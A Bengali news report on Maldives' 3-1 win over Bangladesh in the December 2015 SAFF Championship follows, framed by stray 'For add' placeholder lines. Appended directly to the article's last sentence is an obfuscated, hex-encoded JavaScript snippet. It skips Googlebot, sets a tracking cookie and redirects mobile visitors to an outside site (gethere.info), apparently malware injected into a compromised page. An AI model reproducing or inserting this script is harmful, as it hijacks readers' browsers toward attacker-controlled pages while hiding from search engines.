for Add
: ২৬ ডিসেম্বর ২০১৫, শনিবার, ২০:২৪:৫৯

মালদ্বীপ ৩ : ১ বাংলাদেশ
নিজস্ব প্রতিবেদক : খেলার বাকি তখন ৩ মিনিট। মালদ্বীপের বিপক্ষে বাংলাদেশ পিছিয়ে ১-০ গোলে। ঠিক তখন হেমন্ত ভিনসেন্ট বিশ্বাসের শট মালদ্বীপের এক ডিফেন্ডারের মাথা ছুঁয়ে জালে। ম্যাচ সমতা ১-১ গোলে। বাংলাদেশ শিবিরে তখন বাধভাঙ্গা উচ্ছ্বাস-যেন ট্রফিটাই নিশ্চিত করে ফেলেছে মামুনুরা। ম্যাচটা ড্র করতে পারলেও জ্বলে থাকবে আশার বাতি। শেষ ম্যাচে ভূটানকে হারালে যে তৈরী হতে পারে সেমির সম্ভাবনা। বাংলাদেশের সেআশার বাতি নেভাতে বেশি সময় নেয়নি মালদ্বীপ। নির্ধারিত সময়ের শেষ মিনিটে আবার গোল করে এগিয়ে যায় আশফাক আলীরা। বাংলাদেশের সামনে আগানোর সম্ভাবনার কবর তৈরী হয় শেষ মিনিটে গোল খেয়ে। তাতেই থেমে থাকেনি মালদ্বীপ-বাড়িয়ে দেয়া সময়ের (৫ মিনিট) শেষ মিনিটে জয়ের ব্যবধানটাও বাড়িয়ে ৩-১ করে ফেলে তারা। মাথা নিচু করে মাঠ ছাড়ে মারফুল হকের দল। তিন ম্যাচের দুটিতে হেরে আরও একবার সাফ ফুটবলের গ্রুপ পর্ব থেকে বিদায় নেয়াটা প্রায় নিশ্চিত। এর আগের দুই আসরেও গ্রুপ পর্ব থেকে বিদায় নিয়েছে লাল সবুজ জার্সিধারীরা। হায়রে বাংলাদেশের ফুটবল! বাংলাদেশের তৃতীয় ও গ্রুপের শেষ ম্যাচ ভুটানের বিরুদ্ধে, আগামী সোমবার। আর মালদ্বীপের তৃতীয় ও শেষ গ্রুপ ম্যাচ বর্তমান শিরোপাধারী আফগানিস্তানের বিরুদ্ধে, একই দিনে। ওই দুই ম্যাচের ফল বাংলাদেশের ভাগ্যে কোনো প্রভাব পড়বে না।
শনিবার দিনটা হয়তো শনিময় ছিল মারুফুল হকের শিষ্যদের জন্য। যত গর্জে, তত বর্ষে না। শনিবার বাংলাদেশের খেলা দেখে মনে হয়েছে তেমনটাই। মাঠে তাদের শরীরী ভাষা দেখে মনেই হয়নি গোলের ও জয়ের জন্য তারা খেলছে। প্রতিপক্ষের দ্রুতগতির ফুটবলের বিপরীতে যেন দাঁড়িয়ে দাঁড়িয়ে খেলা। মালদ্বীপের কৌশলী ফুটবলের কাছে মাথা তুলে দাঁড়াতে পারেনি বাংলাদেশ। দলনায়ক মামুনুলের খেলা ছিল হতাশাজনক এবং ভুলে ভরা। প্রথমার্ধে উইঙ্গার এক জাহিদ হোসেনই একটু যা খেলেছেন। অনেকগুলোর গোলের সুযোগ তৈরি করেছিলেন, কিন্তু সেগুলোর একটাও কাজে লাগাতে পারেননি তার সতীর্থরা।
২৭ মিনিটে ওয়ালী ফয়সালের ক্রস থেকে জাহিদের হেড মালদ্বীপেরপোস্টের সামান্য বাইরে দিয়ে চলে যায়। ৪১ মিনিটে পেনাল্টি বক্সে মালদ্বীপের ইমাজের শট ফেরাতে গিয়ে হ্যান্ডবল করে ফেলেন লেফট ব্যাক ওয়ালী ফয়সাল। এজন্য ভিয়েতনামের রেফারি ওঢালীকে হলুদ কার্ড দেখানোর পাশাপাশি পেনাল্টিরও নির্দেশ দেন। আশফাকের বা পায়ের সামান্য উচুঁ শট ডানদিকে ঝাঁপিয়ে পড়ে নিজের হাতে লাগিয়েও শেষরক্ষা করতে পারেননি গোলরক্ষক শহীদুল আলম সোহেল। ৮৭ মিনিটে মামুনুলের কর্নারে মালদ্বীপের এক ফুটবলার হেড করে ফেরালে বক্সের বাইরে পেয়ে যান হেমন্ত। এই মিডফিল্ডারের দ্রুত ভলি মালদ্বীপের এক ফুটবলারের মাথা ছুঁয়ে জালে জড়ায় । ৮৯ মিনিটে সতীর্থের বাড়ানো বলে নিখুঁত ব্যাক ফ্লিকে বাংলাদেশ গোলরক্ষককে পরাস্ত করেন বদলি ফরোয়ার্ড নিয়াজ হাসান। ইনজুরি টাইমে আর এক গোল করে গ্রুপের টানা দ্বিতীয় জয় ও সেমিফাইনাল নিশ্চিত করে নেয় ২০০৮ সালের সাফ ফুটবলের চ্যাম্পিয়ন মালদ্বীপ।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
For add
For add
For add
For add
for Add